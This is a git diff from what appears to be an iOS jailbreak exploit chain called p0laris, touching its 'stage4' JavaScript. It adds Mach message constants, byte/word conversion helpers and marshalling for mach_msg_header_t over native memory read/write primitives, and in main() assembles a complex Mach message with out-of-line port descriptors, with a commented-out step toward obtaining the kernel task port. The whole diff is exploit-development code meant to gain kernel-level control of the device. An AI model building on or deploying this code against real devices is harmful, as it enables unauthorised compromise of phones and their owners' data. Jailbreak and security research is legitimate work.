diff options
| -rw-r--r-- | src/stage4/lib/mach.js | 6 | ||||
| -rw-r--r-- | src/stage4/lib/native_ptr.js | 51 | ||||
| -rw-r--r-- | src/stage4/lib/str.js | 9 | ||||
| -rw-r--r-- | src/stage4/main.js | 13 |
4 files changed, 70 insertions, 9 deletions
diff --git a/src/stage4/lib/mach.js b/src/stage4/lib/mach.js new file mode 100644 index 0000000..d9e6b6a --- /dev/null +++ b/src/stage4/lib/mach.js @@ -0,0 +1,6 @@ +function MACH_MSGH_BITS(remote, local) { + return ((remote) | ((local) << 8)); +} + +var MACH_MSGH_BITS_COMPLEX = 0x80000000; +var MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;
\ No newline at end of file diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js index aa79130..1ae7644 100644 --- a/src/stage4/lib/native_ptr.js +++ b/src/stage4/lib/native_ptr.js @@ -5,8 +5,6 @@ class native_ptr { this.count = arguments[0]; var our_proto = Object.getPrototypeOf(this); - p0laris_log(JSON.stringify(Object.getPrototypeOf(this))); - if (our_proto.predef == true) { this.size = our_proto.size; this.buf_to_obj = our_proto.buf_to_obj; @@ -44,6 +42,8 @@ class native_ptr { n = 0; } + var buf_yahtzee = read_buf(this.addy + (n * this.size), this.size); + return this.buf_to_obj(read_buf(this.addy + (n * this.size), this.size)); } @@ -140,6 +140,20 @@ function u32xn_to_u8xn(buf) { return ret; } +function u8xn_to_u32xn(buf) { + var ret = new Uint32Array(buf.length >>> 2); + + for (var i = 0; i < buf.length; i += 4) { + var tmp = [buf[(i) + 0], + buf[(i) + 1], + buf[(i) + 2], + buf[(i) + 3]]; + ret[i >> 2] = u8x4_to_u32(tmp); + } + + return ret; +} + /* typedef struct{ mach_msg_bits_t msgh_bits; @@ -151,13 +165,38 @@ typedef struct{ } mach_msg_header_t; */ function mach_msg_header_t_buf_to_obj(buf) { - var ret = new Uint8Array(24); + var arr = u8xn_to_u32xn(buf); + var ret = {}; + + ret.msgh_bits = arr[0]; + ret.msgh_size = arr[1]; + ret.msgh_remote_port = arr[2]; + ret.msgh_local_port = arr[3]; + ret.msgh_voucher_port = arr[4]; + ret.msgh_id = arr[5]; + + return ret; } -function Request_sp_buf_to_obj(buf) { +function mach_msg_header_t_obj_to_buf(obj) { + var arr = [obj.msgh_bits, + obj.msgh_size, + obj.msgh_remote_port, + obj.msgh_local_port, + obj.msgh_voucher_port, + obj.msgh_id]; + var ret = u32xn_to_u8xn(arr); + return ret; +} + +function Request_sp_buf_to_obj(buf) { +// var arr = [buf.msg] } +var mach_msg_header_t = native_ptr_type(24, + mach_msg_header_t_buf_to_obj, + mach_msg_header_t_obj_to_buf); var mach_msg_ool_ports_descriptor_t = native_ptr_type(12, - mach_msg_ool_ports_descriptor_t_buf_to_obj, - mach_msg_ool_ports_descriptor_t_obj_to_buf);
\ No newline at end of file + mach_msg_ool_ports_descriptor_t_buf_to_obj, + mach_msg_ool_ports_descriptor_t_obj_to_buf);
\ No newline at end of file diff --git a/src/stage4/lib/str.js b/src/stage4/lib/str.js new file mode 100644 index 0000000..3d543a0 --- /dev/null +++ b/src/stage4/lib/str.js @@ -0,0 +1,9 @@ +function dump_u32xn(buf) { + var s = ""; + + for (var i = 0; i < buf.length; i++) { + s += pad_left(buf[i].toString(16), "0", 8); + } + + return s; +}
\ No newline at end of file diff --git a/src/stage4/main.js b/src/stage4/main.js index b24f52b..ce470f9 100644 --- a/src/stage4/main.js +++ b/src/stage4/main.js @@ -55,8 +55,6 @@ function main() { sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; prep_shit(); - p0laris_log("%s", prim_hexdump(u32xn_to_u8xn([0x41424344, 0x45464748, 0x494a4b4c, 0x4d4e4f50]))); - var init_port_set = new mach_msg_ool_ports_descriptor_t(4); var addy = init_port_set.addy; var init_port_set_obj = init_port_set.deref(); @@ -65,7 +63,6 @@ function main() { init_port_set_obj.disposition = 19; init_port_set_obj.deallocate = false; init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; - p0laris_log("%x", addy); init_port_set.write(init_port_set_obj, 0); init_port_set.write(init_port_set_obj, 1); init_port_set.write(init_port_set_obj, 2); @@ -74,6 +71,16 @@ function main() { JSON.stringify(init_port_set.deref(1)), JSON.stringify(init_port_set.deref(2)), JSON.stringify(init_port_set.deref(3))); + + var Head = new mach_msg_header_t(); + var addy = Head.addy; + var Head_obj = Head.deref(); + Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE); + Head_obj.msgh_remote_port = 0x41424344; + Head_obj.msgh_local_port = 0x45464748; + Head_obj.msgh_id = 1337; + Head.write(Head_obj); + p0laris_log("%s", JSON.stringify(Head.deref())); // var tfp0 = get_kernel_task(); |